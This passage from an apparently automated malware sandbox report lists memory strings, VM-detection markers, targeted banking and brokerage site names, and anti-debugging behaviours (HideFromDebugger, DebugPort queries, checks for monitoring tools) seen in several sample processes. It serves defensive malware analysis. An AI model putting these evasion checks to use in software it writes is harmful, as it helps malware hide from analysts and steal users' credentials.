Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2496187977.0000000002757000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2496187977.00000000027A8000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3323751000.0000000001158000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000013.00000002.3323751000.000000000118D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3324088102.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000014.00000002.3324088102.0000000000CE9000.00000004.00000020.00020000.00000000.sdmp, 9fa327eb6c.exe, 00000015.00000002.2718500578.00000000025B8000.00000004.00000020.00020000.00000000.sdmp, 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000272E000.00000004.00000020.00020000.00000000.sdmp, 9fa327eb6c.exe, 00000019.00000002.2829021597.0000000002761000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959579682.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909956595.000001B107486000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: 9fa327eb6c.exe, 00000019.00000002.2829021597.000000000270B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware2p
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: RoamingIJEGHJECFC.exe, 00000005.00000003.2252768790.0000000000C2D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: xVBoxService.exe
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 9fa327eb6c.exe, 00000015.00000002.2718500578.0000000002589000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000003.2135139342.0000000028D0C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: firefox.exe, 0000001F.00000002.2959579682.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909956595.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2910203943.000001B107486000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2909110092.000001B107486000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: VBoxService.exe
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 0000001C.00000002.3349004818.00000000022BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0N
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: VMWare
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: 8e8f4571c5.exe, 00000018.00000002.3310958803.0000000000696000.00000040.00000001.01000000.00000011.sdmp, 8e8f4571c5.exe, 0000001C.00000002.3311034201.0000000000696000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Thread information set: HideFromDebugger
Source: C:\Users\userAAKKKEBFCG.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process queried: DebugPort
Source: C:\Users\userAAKKKEBFCG.exe Process queried: DebugPort
Source: C:\Users\userAAKKKEBFCG.exe Process queried: DebugPort
Source: C:\Users\userAAKKKEBFCG.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Code function: 5_2_04CB0100 rdtsc 5_2_04CB0100
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041ACFA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00404610 VirtualProtect ?,00000004,00000100,00000000 0_2_00404610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAd